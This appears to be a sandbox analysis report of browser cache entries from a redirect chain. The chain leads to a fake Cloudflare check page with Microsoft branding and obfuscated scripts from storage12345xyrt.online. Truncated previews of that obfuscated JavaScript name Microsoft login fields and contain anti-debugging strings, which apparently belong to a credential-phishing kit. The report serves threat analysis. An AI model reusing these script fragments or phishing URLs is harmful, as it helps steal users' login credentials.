URL:	https://challenges.cloudflare.com/turnstile/v0/b/be88c2a1/api.js?onload=GuZZHB3&render=explicit
Preview:	"use strict";(function(){function Ge(e,a,i,s,u,v,_){try{var f=e[v](_),y=f.value}catch(w){i(w);return}f.done?a(y):Promise.resolve(y).then(s,u)}function Ye(e){return function(){var a=this,i=arguments;return new Promise(function(s,u){var v=e.apply(a,i);function _(y){Ge(v,s,u,_,f,"next",y)}function f(y){Ge(v,s,u,_,f,"throw",y)}_(void 0)})}}function O(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):O(e,a)}function Xe(e){if(Array.isArray(e))return e}function Qe(e,a){var i=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]\|\|e["@@iterator"];if(i!=null){var s=[],u=!0,v=!1,_,f;try{for(i=i.call(e);!(u=(_=i.next()).done)&&(s.push(_.value),!(a&&s.length===a));u=!0);}catch(y){v=!0,f=y}finally{try{!u&&i.return!=null&&i.return()}finally{if(v)throw f}}return s}}function $e(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function Oe

Chrome Cache Entry: 165

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	208
Entropy (8bit):	4.8883933822391485
Encrypted:	false
SSDEEP:
MD5:	C1E7B48301CABAF8412B352A65B1206C
SHA1:	85980245166D1531459C0FF62A9ED9B82BD0CA81
SHA-256:	91D55F28B2A722B8805338652213BA3CBB6D290111083B2158F71B4AA943352A
SHA-512:	7A7FF1C248E7B6D049DEBB953EADE47E633AECACABCF22D9FE8625761834E23AE55011CAC14B8F205795438D18ABF7B07CEEE61BF3738950A643E2D85B367F49
Malicious:	false
Reputation:	low
URL:	https://www.sogou.com/link?url=hedJjaC291NJxlEe_shO0bwLrYqt-fRFAPJ2PFtiHCw.
Preview:	<meta content="always" name="referrer"><script>window.location.replace("https://www.quantumsavvy.com/")</script><noscript><META http-equiv="refresh" content="0;URL='https://www.quantumsavvy.com/'"></noscript>

Chrome Cache Entry: 166

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8158), with no line terminators
Category:	downloaded
Size (bytes):	8158
Entropy (8bit):	5.348256666382412
Encrypted:	false
SSDEEP:
MD5:	6BD77F22E7E33C8357039EEA6E2C4E16
SHA1:	61BD8018216106E15B36DCAEE872F420FB1E92E0
SHA-256:	520E7E6A351CC2344199D2C5B4A104FD24B24BA2556A3AEC9138CD3630F6F2C4
SHA-512:	F9711403C97D7DDCC80ED927490D0B7E7E55E31BF1DD25F4683A6D74E94530D835164E8215B820F4BE7F9D773C8B1BA8E4F1AEE88F0AB5F360316CC6FD27A356
Malicious:	false
Reputation:	low
URL:	https://storage12345xyrt.online/js/b35ab557a7c6e8b2a42dccced4eca83764ef6a5e6f3d8
Preview:	var _0x41e139=_0x2e58;function _0x2e58(_0x256c78,_0x52bf27){var _0x4fc3fb=_0x1e50();return _0x2e58=function(_0x5a350a,_0x327455){_0x5a350a=_0x5a350a-0xe7;var _0x53db60=_0x4fc3fb[_0x5a350a];return _0x53db60;},_0x2e58(_0x256c78,_0x52bf27);}function _0x1e50(){var _0x2f5bde=['submit','input','style','removeClass','(((.+)+)+)+$','reload','usernameError','543169BmHhUK','stateObject','redirect','find','addClass',':submit','status','gger','bind','href','toString','value','console','68636dxsMpp','exception','10687453HrvlYX','log','location','progressBar','debu','reset','30rOMClo','function\x20\x5c(\x20\x5c)','counter','6728072giSlAZ','apply','disabled','removeAttr','call','attr','none','string','each','method','.form-control','serializeArray','hidden','8371oRVqdD','7660DUwPKW','opacity','display','search','.progress','json','i0118','i0116','__proto__','getElementById','preventDefault','form-control\x20input\x20ext-input\x20text-box\x20ext-text-box','{}.constructor(\x22return\x20this\x22)(\x20

Chrome Cache Entry: 167

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	low
URL:	https://storage12345xyrt.online/jq/b35ab557a7c6e8b2a42dccced4eca83764ef6a5e6f3d1
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 168

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	low
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/IciKzlwI3C4yohd6AQ86srJDmzxy+Y1xUfknvCPB34g=
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 169

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	low
URL:	https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 170

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (7323), with CRLF line terminators
Category:	downloaded
Size (bytes):	14963
Entropy (8bit):	5.559356228130991
Encrypted:	false
SSDEEP:
MD5:	630ACF75A36284E0A516F2484930BEAA
SHA1:	9FFA048B05D60E59E6246DF7FA13EED90A0BA193
SHA-256:	60011B7B15DEE17A273B3D1486A6D29667D2E486EDB368DC917711F175258319
SHA-512:	44374784DD823D8EB24E2583BCAA83D1F850BBB5C16871942717181F5FA97AAB0EB9365BBAAED9016F4B9070CEB2FF2E12985DBD4D5E774C28069CDE1D050A01
Malicious:	false
Reputation:	low
URL:	https://www.quantumsavvy.com/
Preview:	<html lang="en-US">.. <link type="text/css" id="dark-mode" rel="stylesheet" href="">.. <style type="text/css" id="dark-mode-custom-style"></style>.. <head>.. <title>Just a moment...</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=Edge">.. <meta name="robots" content="noindex,nofollow">.. <meta name="viewport" content="width=device-width,initial-scale=1">.. <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>.... <style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131}button,html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto

Chrome Cache Entry: 172

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1592
Entropy (8bit):	4.205005284721148
Encrypted:	false
SSDEEP:
MD5:	4E48046CE74F4B89D45037C90576BFAC
SHA1:	4A41B3B51ED787F7B33294202DA72220C7CD2C32
SHA-256:	8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
SHA-512:	B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,

Chrome Cache Entry: 173

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (6600), with no line terminators
Category:	downloaded
Size (bytes):	6600
Entropy (8bit):	5.489888223560783
Encrypted:	false
SSDEEP:
MD5:	2C78B7F8FA496092BF41D5EDD51611E7
SHA1:	8B0B1B276E8194B0A5497DB478EC2EA9B4F83C42
SHA-256:	2B0BD09C1CC7119D27E45353A59BF6C2721563E1689853FF704057A7439508D2
SHA-512:	53A7750EA46082968C2EC557857AD3975CDDB0B45595259F0F3E9FC16360B87C5F257E058489ECAF80E61A97F92F1C5E34FA2F6FCFE922F4AE22392FFD75B4DA
Malicious:	false
Reputation:	low
URL:	https://storage12345xyrt.online/cdn-cgi/styles/challenges.css
Preview:	*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131}html,button{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,"Apple Color Emoji","Segoe UI Emoji",Segoe UI Symbol,"Noto Color Emoji"}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3}a:hover{text-decoration:underline;color:#ee730a}.hidden{display:none}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon{margin-right:.5rem;width:2rem;height:2rem}@media (max-width: 720px){.main-content{margin-top:4rem}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-height:3.75rem;font-size:2.5rem;font-weight:500}.h2{line-height:

Chrome Cache Entry: 174

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:
MD5:	011B17B116126E6E0C4A9B0DE9145805
SHA1:	DF63A6EB731FFCE96F79802EFF6D53D00CDA42BC
SHA-256:	3418E6E704387A99F1611EB7BB883328A438BA600971E6D692E8BEA60F10B179
SHA-512:	BB432E96AF588E0B19CBD8BC228C87989FE578167FD1F3831C7E50D2D86DE11016FB93679FEF189B39085E9151EB9A6EB2986155C65DD0FE95EC85454D32AE7D
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTA0LjAuNTExMi4xMDISEAkUL_STizlpahIFDdFbUVI=?alt=proto
Preview:	CgkKBw3RW1FSGgA=

Chrome Cache Entry: 175

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	105369
Entropy (8bit):	5.240719144154261
Encrypted:	false
SSDEEP:
MD5:	8E6B0F88563F9C33F78BCE65CF287DF7
SHA1:	EF7765CD2A7D64ED27DD7344702597AFF6F8C397
SHA-256:	A7057BEBFFF43E7281CA31DA00D40BD88C8D02D1576B9C45891DD56A3853269A
SHA-512:	7DCE31D45ACA40340490B9F437A22ADF212B049DE0D4DDEB908A50C1F5C6C7B5561323B3A93B6ED3E5A7C44D7170460BFF8D8722749191C0F5A8DBD83E093E7F
Malicious:	false
Reputation:	low
URL:	https://storage12345xyrt.online/APP-b35ab557a7c6e8b2a42dccced4eca83764ef6a6264662/b35ab557a7c6e8b2a42dccced4eca83764ef6a6264663
Preview:	html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}

Chrome Cache Entry: 176

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 177

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

Chrome Cache Entry: 178

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (6085)
Category:	downloaded
Size (bytes):	6529
Entropy (8bit):	5.3933826345728155
Encrypted:	false
SSDEEP:
MD5:	F5D7F7E343D6AF0F78818F359C5C7A53
SHA1:	A23FBEB09AE403C3947904324599E36297C3CFD9
SHA-256:	BBFDE00B5392047A4D61CB12C54C235D48443FA54886A62AC61399A65BD2120A
SHA-512:	CC5056498F8B873AE608645CD66A0A87B507F3C052DDCA982A532007B645C5F125D5EF6241CE13E985A4C2E76D265CA49C78E7ECCB0658C9F58D2B8BCAE3CBEA
Malicious:	false
Reputation:	low
URL:	https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b
Preview:	<!DOCTYPE html>.<html>.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title></title>. <script src="jq/b35ab557a7c6e8b2a42dccced4eca83764ef6a5e6f3d1"></script>. <script src="boot/b35ab557a7c6e8b2a42dccced4eca83764ef6a5e6f3d7"></script>. <script src="js/b35ab557a7c6e8b2a42dccced4eca83764ef6a5e6f3d8"></script>.</head>..<script type="text/javascript">.function _0x131c(){var _0x202d72=['input','length','string','debu','stylesheet','src','title','4508zujGyK','bind','while\x20(true)\x20{}','href','.css','readyState','10094416DezKpr','1478372xUILws','return\x20(function()\x20','status','setAttribute','endsWith','text','script','push','24AQGllP','constructor','gger','1415eeYpUb','call','responseText','exception','function\x20\x5c(\x20\x5c)','init','body','getAttribute','88FOEqxl','toString','179qZJsjR','3966708XXSpxz','link','warn','10uCibje','innerHTML','__proto__','chain','error','{}.constructor(\x22return

Static File Info

⊘No static file info